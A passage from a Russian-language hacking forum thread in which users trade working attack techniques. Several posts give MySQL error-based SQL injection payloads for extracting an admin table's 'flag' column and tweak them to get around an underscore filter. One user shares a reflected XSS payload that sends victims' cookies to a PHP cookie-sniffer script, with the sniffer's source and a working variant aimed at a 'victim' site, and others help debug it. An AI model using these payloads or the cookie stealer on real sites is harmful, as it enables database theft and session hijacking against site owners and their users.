Старый 24.09.2012, 02:54   #2371
#Wolf#
 
Аватар для #Wolf#
 
Регистрация: 06.07.2010
Сообщений: 8
Репутация: 1
По умолчанию

Цитата:
Сообщение от spari Посмотреть сообщение
это не time based,это error based.
попробуйте это-
Да, опечатался.
Цитата:
Сообщение от spari Посмотреть сообщение
Код:
And(select 1 from(select count(*),concat(0x3a,(select substr(group_concat(flag),1,150)from admin)),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)z)-- -
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax
Цитата:
Сообщение от aspi Посмотреть сообщение
скорее всего колонки типа varchar, юзай вот это:
962 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select flag from admin limit 1),1,64),floor(rand(0)*2)))--
Тоже
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax

Any ideas?
#Wolf# вне форума   Ответить с цитированием
Старый 24.09.2012, 03:51   #2372
v3r7
 
Регистрация: 23.09.2012
Сообщений: 12
Репутация: 0
По умолчанию

Помогите разобраться,ситуация: есть сайт с Xss и запрос вида:
site/search/?q=" onmouseover=prompt(3333) /><html><script>document.write(document.cookie);</script><script src="http://127.0.0.1/my.net/14/sniff.php?cookie="+document.cookie;></script></html>bad=<"
в итоге на экране я вижу куки,а на сниф приходит пустота... вот код снифа:
Код HTML:
<?php

if (isset($_GET['cookie']))
{
$text = "cookie=".$_GET['cookie']."New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of F Y h:i:s A');
$text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n";
$file = fopen("./sniff.txt", "a");
fwrite($file, $text);
fclose($file);
}

$date=date("[D|d/m/Y|H:i]");
$ip=getenv("Remote_addr");
$real_ip=getenv("HTTP_X_FORWARDED_FOR");
$otkuda=getenv("HTTP_REFERER");
$browser=getenv("HTTP_USER_AGENT");
$win=getenv("windir");
$uid=implode($argv," ");

$fp=fopen("./log.txt","a");
fputs($fp,"$date\t|$uid|\t$ip($real_ip)\t$browser\ t$otkuda\t$win\n");
fclose($fp);

?>

лог sniff.txt:
cookie=New cookie accept from 127.0.0.1 at Monday 24th of September 2012 02:41:59 AM
======================

======================


Но куки есть на экране я их вижу :__utma=60026301.3309837.......///etc
Так вот два вопроса в чём ошибка? почему кукисы не приходят?
И что можно сделать при пассивной Xss ,кроме их кражи и псевдо дефейса,чтоесть как события могут ещё разворачиваться?
v3r7 вне форума   Ответить с цитированием
Старый 24.09.2012, 07:57   #2373
v3r7
 
Регистрация: 23.09.2012
Сообщений: 12
Репутация: 0
По умолчанию

нашёл решение..... www.victim.ru/search/?q=" onmouseover=/><script>img=new Image ();img.src="http://sniff/sniff.php?cookie="%2Bdocument.cookie</script><h1>bad=<" но оно какое то сомнительное.. никто других вариантов не подскажет?
v3r7 вне форума   Ответить с цитированием
Старый 24.09.2012, 09:27   #2374
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

v3r7,
Нормальное решение, так и должно быть. А в первом варианте не работало из-за невалидного тега:
Код:
<script src="http://127.0.0.1/my.net/14/sniff.php?cookie="+document.cookie;></script>
Но если надо именно как в первом варианте, см. в гугле по запросу "append script js". Или делайте document.write() вместе с этим тегом.

#Wolf#,
Показывайте линк.
Untitled вне форума   Ответить с цитированием
Старый 24.09.2012, 16:11   #2375
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

#wolf#,попробовать что одна
Код:
962+and(select 1 from(select count(*),concat((select substr(group_concat(flag),1,150)from admin),floor(rand(0)*2))x from information_schema.tables group by x)z)-- -
spari вне форума   Ответить с цитированием
Старый 24.09.2012, 16:23   #2376
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

Подскажите, как обойти. Фильтруется символ _ в information_schema.columns\tables
Выдает ошибку

Error No: 1064 - MySQL error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\_schema.tables-- %'' at line 1

5.5.27-log
Consistent вне форума   Ответить с цитированием
Старый 24.09.2012, 17:08   #2377
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

Цитата:
Сообщение от spari Посмотреть сообщение
have you tried %5f instead of _?
Yes, it does not work.
Consistent вне форума   Ответить с цитированием
Старый 24.09.2012, 17:24   #2378
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

so try to replace the table.
Код:
962+and(select 1 from(select count(*),concat((select substr(group_concat(flag),1,150)from admin),floor(rand(0)*2))x from admin group by x)z)-- -
or any other table,without _.
spari вне форума   Ответить с цитированием
Старый 24.09.2012, 17:28   #2379
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

MySQL error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group\_concat

The symbol _ is filtered. I need a bypass! error based is misplaced.
Consistent вне форума   Ответить с цитированием
Старый 24.09.2012, 17:36   #2380
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

this one should do the trick-
Код:
962+and(select 1 from(select count(*),concat((select substr(concat(flag),1,150)from admin),floor(rand(0)*2))x from admin group by x)z)-- -
spari вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot